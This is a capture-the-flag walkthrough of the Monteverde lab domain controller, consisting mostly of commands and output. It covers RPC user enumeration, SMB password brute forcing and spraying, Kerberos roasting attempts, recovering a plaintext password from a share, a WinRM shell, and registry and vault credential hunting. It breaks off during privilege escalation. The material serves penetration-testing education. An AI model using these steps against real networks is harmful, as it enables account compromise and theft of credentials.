MONTEVERDE

PRIMARY CATEGORY → MEDIUM

Summary

• User Enumeration via RPC using rpcclient and Net RPC (both Samba Suite)
• Listing the Domain Password Policy with netexec
• SMB Password Bruteforce (user ↔ user) using netexec
• SPN Enumeration via LDAP using ldapsearch
• Listing SMB Shares with netexec and SMBMap
• Information Leakage via SMB (Plain Password)
• SMB Password Spraying
• Domain Enumeration with ldapdomaindump
• Extracting Azure AD Connect credentials located on SQL Server

---

Setup

Directory creation with the Machine’s Name

mkdir Monteverde && cd !$

Creation of a Pentesting Folder Structure to store all the information related to the target

mkdir {Scans,Data,Tools}

---

Recon #1

As mentioned, according to the TTL, It seems that It is a WINDOWS Target

Port Scanning

General Scan

Let’s run a Nmap Scan to check what TCP Ports are opened in the machine

The Scan result is exported in a grepable format for subsequent Port Parsing

nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG monteverde.allPorts 10.129.228.111

monteverde.allPorts

# Nmap 7.94SVN scan initiated Sat Oct  4 20:48:30 2025 as: nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn --disable-arp-ping -oG monteverde.allPorts 10.129.228.111
# Ports scanned: TCP(65535;1-65535) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.129.228.111 ()	Status: Up
Host: 10.129.228.111 ()	Ports: 53/open/tcp//domain///, 88/open/tcp//kerberos-sec///, 135/open/tcp//msrpc///, 139/open/tcp//netbios-ssn///, 389/open/tcp//ldap///, 445/open/tcp//microsoft-ds///, 464/open/tcp//kpasswd5///, 593/open/tcp//http-rpc-epmap///, 636/open/tcp//ldapssl///, 3268/open/tcp//globalcatLDAP///, 3269/open/tcp//globalcatLDAPssl///, 5985/open/tcp//wsman///, 9389/open/tcp//adws///, 49667/open/tcp/////, 49673/open/tcp/////, 49674/open/tcp/////, 49676/open/tcp/////, 49696/open/tcp/////, 49749/open/tcp/////	Ignored State: filtered (65516)
# Nmap done at Sat Oct  4 20:48:57 2025 -- 1 IP address (1 host up) scanned in 26.47 seconds

Open Ports →

53, 88, 135, 139, 389, 445, 464, 593, 636, 3268, 3269, 5985, 9389, 49667, 49673, 49674, 49676, 49696 and 49749

Comprehensive Scan

We can apply a little filter to the monteverde.allPorts file to extract the ports and conduct a more comprehensive scan on them by extracting the services and their version running on each port and also executing some default scripts to gather more information

Note that this scan is also exported to have evidence at hand

nmap -p$( grep -ioP --color -- '\d{1,5}(?=/open)' monteverde.allPorts | xargs | sed 's@\s@,@g' ) -sCV -n -Pn --disable-arp-ping -oN monteverde.targeted 10.129.228.111

monteverde.targeted

# Nmap 7.94SVN scan initiated Sat Oct  4 20:50:18 2025 as: nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49667,49673,49674,49676,49696,49749 -sCV -n -Pn --disable-arp-ping -oN monteverde.targeted 10.129.228.111
Nmap scan report for 10.129.228.111
Host is up (0.14s latency).
 
PORT      STATE SERVICE       VERSION
53/tcp    open  domain        Simple DNS Plus
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-10-04 18:50:25Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp  open  mc-nmf        .NET Message Framing
49667/tcp open  msrpc         Microsoft Windows RPC
49673/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49674/tcp open  msrpc         Microsoft Windows RPC
49676/tcp open  msrpc         Microsoft Windows RPC
49696/tcp open  msrpc         Microsoft Windows RPC
49749/tcp open  msrpc         Microsoft Windows RPC
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows
 
Host script results:
| smb2-time: 
|   date: 2025-10-04T18:51:17
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
 
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Oct  4 20:51:58 2025 -- 1 IP address (1 host up) scanned in 99.46 seconds

139, 445 - SMB

As always, let’s start enumerating the SMB service of the target, so we can have more information about it, such as the hostname, the OS Version and the domain name

nxc smb 10.129.228.111

Command Output

SMB         10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)

The SMB signing is enabled, so an operator could not relay a victim authentication over SMB to the SMB Server

Said that, let’s start by adding the hostname and domain name to the /etc/hosts file in order to be able to perform certain attacks that envolves kerberos.

Since this service is closely related to DNS, we must reference the target using its hostname instead of the IP Address

printf "\n%s\t%s\t%s\t%s" "10.129.228.111" "monteverde" "megabank.local" "monteverde.megabank.local" >> /etc/hosts

/etc/hosts

#Host addresses
127.0.0.1  localhost
127.0.1.1  parrot
::1        localhost ip6-localhost ip6-loopback
ff02::1    ip6-allnodes
ff02::2    ip6-allrouters
 
# Custom Local Lab
192.168.1.133   4l3x-pc
192.168.1.100   dc01 DC01 dc01.lab.local lab.local
192.168.1.142   ws01  ws01.lab.local
 
# HTB Machines
10.129.228.111	monteverde	megabank.local	monteverde.megabank.local

For the time being, we do not have any valid domain credentials, so we cannot authenticate via SMB in order to list the available shares

But, it is always worth checking for the following primes →

• Null Authentication

nxc smb monteverde --username '' --password '' --shares

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\: 
SMB                      10.129.228.111  445    MONTEVERDE       [-] Error enumerating shares: STATUS_ACCESS_DENIED

But we get an STATUS_ACCES_DENIED error code

• Guest Authentication

nxc smb monteverde --username 'guest' --password '' --shares

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\guest: STATUS_ACCOUNT_DISABLED 

In this case, the guest account is disabled. It was to be expected as it is the default behavior

• Random user Authentication

nxc smb monteverde --username 'anyRandomUser' --password '' --shares

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\anyRandomUser: STATUS_LOGON_FAILURE 

Nothing here either

There is not much more we can do here, let’s move on!

53 - DNS

When we talk about DNS Enumeration on a DC, the Active Directory Integrated DNS (ADIDNS) comes into play

Any authenticated user account on AD can list any existent DNS record on the domain zone and create new ones

Since we do not have any valid credentials yet, we cannot list any DNS record, so right now we are limited to certain actions

One of them would be the Domain Zone Transfer. So, let’s carry out it

dig axfr megabank.local @10.129.228.111

Command Output

; <<>> DiG 9.18.33-1~deb12u2-Debian <<>> axfr megabank.local @10.129.228.111
;; global options: +cmd
; Transfer failed.

But we get a “Transfer failed” error as we are not authorized to perform this action

135 - RPC

The RPC Endpoint Mapper is listening on this port. It maps any RPC Endpoint to an specific dynamic port or system named pipe

We can try another null authentication against the RPC Endpoint related to users, groups and so on

rpcclient --user '' --no-pass --command 'enumdomusers' monteverde | grep -ioP --color -- '^user:\[\K[\w\-_]+(?=\])'

Command Output

Guest
AAD_987d7f2f57d2
mhope
SABatchJobs
svc-ata
svc-bexec
svc-netapp
dgalanos
roleary
smorgan
```

And we are able to list all the domain user accounts

We can do this in a cleaner way as follows

net rpc user -U '%' -S monteverde

Command Output

AAD_987d7f2f57d2
dgalanos
Guest
mhope
roleary
SABatchJobs
smorgan
svc-ata
svc-bexec
svc-netapp

We can also list the description for all user accounts. There is sometimes sensitive information such as passwords, keys and so on

rpcclient --user '' --no-pass --command 'querydispinfo' monteverde

Command Output

index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2	Name: AAD_987d7f2f57d2	Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos	Name: Dimitris Galanos	Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest	Name: (null)	Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope	Name: Mike Hope	Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary	Name: Ray O'Leary	Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs	Name: SABatchJobs	Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan	Name: Sally Morgan	Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata	Name: svc-ata	Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec	Name: svc-bexec	Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp	Name: svc-netapp	Desc: (null)

But there is nothing interesting

Since we already have a valid user list, let’s perform a kerberos-related attack

88 - Kerberos

Other times, when we could not get a foothold in the domain through null authentication, we have to leverage some kerberos error on the KDC responses in order to get valid user accounts

This action is usually performed using Kerbrute’s userenum module along with a userlist from statistically-likely-usernames

But, this time, as mentioned, we already have a valid user accounts list, so we can carry out an ASREPRoast attack using Impacket’s GetNPUsers.py

GetNPUsers.py -dc-ip 10.129.228.111 -usersfile ./users.list -no-pass 'megabank.local/'

Command Output

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
[-] User AAD_987d7f2f57d2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dgalanos doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User mhope doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User roleary doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User SABatchJobs doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smorgan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-ata doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-bexec doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User svc-netapp doesn't have UF_DONT_REQUIRE_PREAUTH set

All above user accounts do not have the USER_DONT_REQ_PREAUTH flag enabled on their UserAccountControl attribute. So, we will not receive any encrypted part from the AS_REP, which is encryped with a key derived from the user account password

The previous impacket tool returns the hash in hashcat or john format if any of the provided users is susceptible to ASREPRoast

Password Bruteforce

Right now, there is not much we can do except from enumerate LDAP

But, before that, let’s perform an SMB Bruteforce attack by providing as user and password list the same file

An operator must check the domain password policy to be aware of permanent or temporal account blocks

Let’s check if we can list this information via the null authentication

nxc smb monteverde --username '' --password '' --pass-pol

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB                      10.129.228.111  445    MONTEVERDE       [+] Dumping password info for domain: MEGABANK
SMB                      10.129.228.111  445    MONTEVERDE       Minimum password length: 7
SMB                      10.129.228.111  445    MONTEVERDE       Password history length: 24
SMB                      10.129.228.111  445    MONTEVERDE       Maximum password age: 41 days 23 hours 53 minutes 
SMB                      10.129.228.111  445    MONTEVERDE       
SMB                      10.129.228.111  445    MONTEVERDE       Password Complexity Flags: 000000
SMB                      10.129.228.111  445    MONTEVERDE          Domain Refuse Password Change: 0
SMB                      10.129.228.111  445    MONTEVERDE          Domain Password Store Cleartext: 0
SMB                      10.129.228.111  445    MONTEVERDE          Domain Password Lockout Admins: 0
SMB                      10.129.228.111  445    MONTEVERDE          Domain Password No Clear Change: 0
SMB                      10.129.228.111  445    MONTEVERDE          Domain Password No Anon Change: 0
SMB                      10.129.228.111  445    MONTEVERDE          Domain Password Complex: 0
SMB                      10.129.228.111  445    MONTEVERDE       
SMB                      10.129.228.111  445    MONTEVERDE       Minimum password age: 1 day 4 minutes 
SMB                      10.129.228.111  445    MONTEVERDE       Reset Account Lockout Counter: 30 minutes 
SMB                      10.129.228.111  445    MONTEVERDE       Locked Account Duration: 30 minutes 
SMB                      10.129.228.111  445    MONTEVERDE       Account Lockout Threshold: None
SMB                      10.129.228.111  445    MONTEVERDE       Forced Log off Time: Not Set

The interesting line is the following one →

Account Lockout Threshold: None

There is no threshold, so an attacker could perform a bruteforce attack without worrying about blocking user accounts

Therefore, let’s proceed as follows

nxc smb monteverde --username users.list --password users.list --continue-on-success

Command Output

<SNIP>
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB         10.129.228.111  445    MONTEVERDE       [-] Connection Error: Error occurs while reading from remote(104)
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:SABatchJobs STATUS_LOGON_FAILURE
<SNIP>

And we have a match!

Recon #2

88 - Kerberos

With valid credentials, the game changes completely. Now we have a broader framework for action

Let’s start with a Kerberoasting attack

As authenticated users, we can list all Service Principal Names (SPNs) registered in the domain. A domain account becomes a service account when it has one or more SPNs registered

Likewise, we can request a service ticket (ST) for an specific SPN to the Ticket Granting Server (TGS) of the Key Distribution Center (KDC)

Then, we receive a TGS_REP which contains basically two elements →

• Service Ticket (ST)

It contains the Privilege Attribute Certificate (PAC) related to the user who requested the service ticket and the Session Key of the service ticket. This session key is used in the subsequent AP_REQ to encrypt the authenticator (timestamp)

The encrypted part of the service ticket is protected using a key derived from the service account password

• Encrypted Part

It only contains the session key of the service ticket and it is encrypted using the session key of the presented Ticket Granting Ticket during the AS Exchange

Therefore, the kerberos client could decrypt this enc_part using the TGT’s session key

This is because the client cannot decrypt the service ticket as it is encrypted using a key derived from the service account password, so it only can obtain the session key by decrypting the encrypted part with the TGT’s session key

An operator could use Impacket’s GetUserSPNs.py

GetUserSPNs.py -dc-ip 10.129.228.111 'megabank.local/SABatchJobs:SABatchJobs'

Command Output

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 
 
No entries found!

But there are no SPNs for any domain user account

Take into account that it is always easier to crack passwords for user accounts than for computer accounts as the latter are randomly generated by default and, therefore, more complex

We can also extract all domain Service Principal Names via LDAP as follows

ldapsearch -LLL -x -H 'ldap://monteverde.megabank.local' -D 'SABatchJobs@megabank.local' -w 'SABatchJobs' -b 'dc=megabank,dc=local' '(servicePrincipalName=*)' servicePrincipalName | grep -i --color -- 'servicePrincipalName'

Command Output

servicePrincipalName: Dfsr-12F9A27C-BF97-4787-9364-D31B6C55EB04/MONTEVERDE.MEG
servicePrincipalName: ldap/MONTEVERDE.MEGABANK.LOCAL/ForestDnsZones.MEGABANK.L
servicePrincipalName: ldap/MONTEVERDE.MEGABANK.LOCAL/DomainDnsZones.MEGABANK.L
servicePrincipalName: DNS/MONTEVERDE.MEGABANK.LOCAL
servicePrincipalName: GC/MONTEVERDE.MEGABANK.LOCAL/MEGABANK.LOCAL
servicePrincipalName: RestrictedKrbHost/MONTEVERDE.MEGABANK.LOCAL
servicePrincipalName: RestrictedKrbHost/MONTEVERDE
servicePrincipalName: RPC/3aa07b0f-2fc3-4f31-864a-ddeca2d35cc5._msdcs.MEGABANK
servicePrincipalName: HOST/MONTEVERDE/MEGABANK
servicePrincipalName: HOST/MONTEVERDE.MEGABANK.LOCAL/MEGABANK
servicePrincipalName: HOST/MONTEVERDE
servicePrincipalName: HOST/MONTEVERDE.MEGABANK.LOCAL
servicePrincipalName: HOST/MONTEVERDE.MEGABANK.LOCAL/MEGABANK.LOCAL
servicePrincipalName: E3514235-4B06-11D1-AB04-00C04FC2DCD2/3aa07b0f-2fc3-4f31-
servicePrincipalName: ldap/MONTEVERDE/MEGABANK
servicePrincipalName: ldap/3aa07b0f-2fc3-4f31-864a-ddeca2d35cc5._msdcs.MEGABAN
servicePrincipalName: ldap/MONTEVERDE.MEGABANK.LOCAL/MEGABANK
servicePrincipalName: ldap/MONTEVERDE
servicePrincipalName: ldap/MONTEVERDE.MEGABANK.LOCAL
servicePrincipalName: ldap/MONTEVERDE.MEGABANK.LOCAL/MEGABANK.LOCAL
servicePrincipalName: kadmin/changepw

As expected, most of the existent SPNs are related to the FOREST$ computer account i.e. the DC

139, 445 - SMB

Now we have valid credentials, so we can list the available shares on the DC

nxc smb monteverde --username 'SABatchJobs' --password 'SABatchJobs' --shares

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs 
SMB                      10.129.228.111  445    MONTEVERDE       [*] Enumerated shares
SMB                      10.129.228.111  445    MONTEVERDE       Share           Permissions     Remark
SMB                      10.129.228.111  445    MONTEVERDE       -----           -----------     ------
SMB                      10.129.228.111  445    MONTEVERDE       ADMIN$                          Remote Admin
SMB                      10.129.228.111  445    MONTEVERDE       azure_uploads   READ            
SMB                      10.129.228.111  445    MONTEVERDE       C$                              Default share
SMB                      10.129.228.111  445    MONTEVERDE       E$                              Default share
SMB                      10.129.228.111  445    MONTEVERDE       IPC$            READ            Remote IPC
SMB                      10.129.228.111  445    MONTEVERDE       NETLOGON        READ            Logon server share 
SMB                      10.129.228.111  445    MONTEVERDE       SYSVOL          READ            Logon server share 
SMB                      10.129.228.111  445    MONTEVERDE       users$          READ            

The above task can also be accomplished using SMBMap

smbmap -H monteverde -d megabank.local -u 'SABatchJobs' -p 'SABatchJobs'

Command Output

[+] IP: monteverde:445	Name: unknown                                           
	Disk                                                  	Permissions	Comment
	----                                                  	-----------	-------
	ADMIN$                                            	NO ACCESS	Remote Admin
	azure_uploads                                     	READ ONLY	
	C$                                                	NO ACCESS	Default share
	E$                                                	NO ACCESS	Default share
	IPC$                                              	READ ONLY	Remote IPC
	NETLOGON                                          	READ ONLY	Logon server share 
	SYSVOL                                            	READ ONLY	Logon server share 
	users$                                            	READ ONLY	

There are three interesting shares →

• SYSVOL

By default, this share is accesible to all authenticated users. It may contains some sensitive information such as plain passwords within a groups.xml file (Group Policy Preferences)

It is always recommended to inspect this share. I prefer to do this either using SMBMap or by mouting it

smbmap -H 'monteverde' -d 'megabank.local' -u 'SABatchJobs' -p 'SABatchJobs' -R 'SYSVOL'

Command Output

[+] IP: monteverde:445	Name: unknown                                           
	Disk                                                  	Permissions	Comment
	SYSVOL                                            	READ ONLY	
	.\SYSVOL\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	MEGABANK.LOCAL
	.\SYSVOL\MEGABANK.LOCAL\*
	dr--r--r--                0 Thu Jan  2 23:11:34 2020	.
	dr--r--r--                0 Thu Jan  2 23:11:34 2020	..
	dr--r--r--                0 Sat Oct  4 20:46:45 2025	DfsrPrivate
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	Policies
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	scripts
	.\SYSVOL\MEGABANK.LOCAL\Policies\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	{31B2F340-016D-11D2-945F-00C04FB984F9}
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	{6AC1786C-016F-11D2-945F-00C04fB984F9}
	.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	fr--r--r--               22 Fri Jan  3 13:47:23 2020	GPT.INI
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	MACHINE
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	USER
	.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\*
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	.
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	..
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	Microsoft
	fr--r--r--             2792 Thu Jan  2 23:17:56 2020	Registry.pol
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	Scripts
	.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	Windows NT
	.\SYSVOL\MEGABANK.LOCAL\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Scripts\*
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	.
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	..
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	Shutdown
	dr--r--r--                0 Fri Jan  3 13:47:06 2020	Startup
	.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	fr--r--r--               22 Thu Jan  2 23:26:34 2020	GPT.INI
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	MACHINE
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	USER
	.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	Microsoft
	.\SYSVOL\MEGABANK.LOCAL\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\*
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	.
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	..
	dr--r--r--                0 Thu Jan  2 23:05:27 2020	Windows NT

But there is nothing interesting

• azure_uploads

Judging by its name, it would be better to have write permission on it, so we could upload a malicious shell command file (SCF) with an icon reference pointing to an SMB Server controlled by us

Then, we could receive an authentication over SMB from the target if any user access to the local folder or share

But we only have read permissions, let’s what it contains

smbmap -H 'monteverde' -d 'megabank.local' -u 'SABatchJobs' -p 'SABatchJobs' -R 'azure_uploads'

Command Output

[+] IP: monteverde:445	Name: unknown                                           
	Disk                                                  	Permissions	Comment
	azure_uploads                                     	READ ONLY	
	.\azure_uploads\*
	dr--r--r--                0 Fri Jan  3 13:43:36 2020	.
	dr--r--r--                0 Fri Jan  3 13:43:36 2020	..

Nothing here either

• users$

This time we will mount it locally in order to inspect it propertly

mkdir mnt
cd !$ && mkdir users\$

mount --type cifs --options username='SABatchJobs',password='SABatchJobs' '//10.129.228.111/users$' users\$

find .

Command Output

users$
users$/dgalanos
users$/mhope
users$/mhope/azure.xml
users$/roleary
users$/smorgan

And we have an XML file called azure.xml

If we inspect its content, we find the following

cat ./users\$/mhope/azure.xml

Command Output

<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>

It contains a plain password →

4n0therD4y@n0th3r$

Password Spraying

Since we have a valid user list, let’s perform a password spraying to see if we compromise another user account

nxc smb monteverde --username users.list --password '4n0therD4y@n0th3r$' --continue-on-success

Command Output

SMB                      10.129.228.111  445    MONTEVERDE       [*] Windows 10 / Server 2019 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\AAD_987d7f2f57d2:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\dgalanos:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\Guest:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\roleary:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\smorgan:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-ata:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-bexec:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 
SMB                      10.129.228.111  445    MONTEVERDE       [-] MEGABANK.LOCAL\svc-netapp:4n0therD4y@n0th3r$ STATUS_LOGON_FAILURE 

And we have valid credentials for the user mhope

Recon #3

389, 636 - LDAP

It’s time for a more exhaustive enumeration of the domain objects such as users, groups, GPOs and so on

This could have been done earlier as we already had valid credentials

We will use ldapdomaindump.py for this task

git clone https://github.com/dirkjanm/ldapdomaindump ldapdomaindump

cd !$ && python3 -m venv .venv
source !$/bin/activate && pip3 install .

mkdir megabank_local.data
cd !$ python3 ldapdomaindump/ldapdomaindump.py --user 'megabank.local\mhope' --password '4n0therD4y@n0th3r$' --no-json --no-grep 'monteverde'

Command Output

[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished

Next, setup an HTTP server in order to inspect the content of the generated files from the browser

python3 -m http.server 80

• Users

The mhope user belongs to the Remote Management Users, which means that we can authenticate as him in order to establish a WinRM session to the DC and gain local access

Likewise, this user account belongs to the group Azure Admins. So now we know that some Azure solution has been deployed recently on the DC

From here, we should take into account things such as Azure AD Connect, Azure stored access tokens and so on. We can dig into it later when we access to the machine remotely

In the other hand, there are users that belong to non-standard groups (operations, helpdesk & trading), namely, smorgan, roleary and dgalanos

Let’s see if there is any nested group membership related to these groups

• Users by Groups

---

Shell as System User

Since there is not much interesting information, let’s connect to the DC via WinRM and see what we can do

evil-winrm --ip 'monteverde' --user 'mhope' --password '4n0therD4y@n0th3r$'

Command Output

Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\mhope\Documents>

---

Privesc

Initial Non-Privileged User → mhope

Extracting Azure AD Connect Credentials located on SQL Server Database

First, let’s list the privileges associated to the current access token

whoami /priv

Command Output

PRIVILEGES INFORMATION
Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

None interesting

It is not necessary to list the groups to which the user belongs as we already know that

We can check for stored credentials on Windows Vaults protected by the Data Protection API (DPAPI)

cmdkey.exe /list

Command Output

Currently stored credentials:
 
* NONE *

But nothing is displayed

We can also try to list autologon credentials

Get-ItemProperty -Path 'HKLM:Software\Microsoft\Windows NT\CurrentVersion\Winlogon' | Select-Object defaultDomainName, defaultUserName, defaultPassword | ft -Wrap

Command Output

DefaultDomainName DefaultUserName defaultPassword
----------------- --------------- ---------------
MEGABANK

Nothing here either

